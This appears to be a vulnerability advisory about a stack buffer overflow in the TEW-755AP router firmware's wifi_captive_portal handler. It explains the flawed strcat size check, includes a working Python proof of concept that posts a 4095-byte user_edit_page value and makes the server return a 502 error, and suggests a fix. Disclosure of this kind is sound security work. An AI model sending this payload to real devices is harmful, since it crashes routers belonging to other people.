We found a stack buffer overflow vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).

In the handler function for action wifi_captive_portal (sub_414898) of the file /www/cgi/ssi, the value of user_edit_page is copied to stack buffer whose length is 4096 via strcat. The size check at line 36 does not consider the length of two constant strings “var user_edit_page=(’” and “’);”. If an attacker specifies user_edit_page as a string with length of 4095, the length of the total string after string concatenation will be more than 4096 (size of stack buffer), in this case it will result in stack buffer overflow.

PoC

import requests

url = "<http://192.168.17.221:80/apply.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'action' : "wifi_captive_portal",
"user_edit_page" : "a"*4095}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

We use python to send a crafted HTTP post request to the web server, and print out the return message.

Send the crafted HTTP request to the server, it will return 502 error code.

Fix Suggestion:

Perform correct size check which considers the size string after concatenation.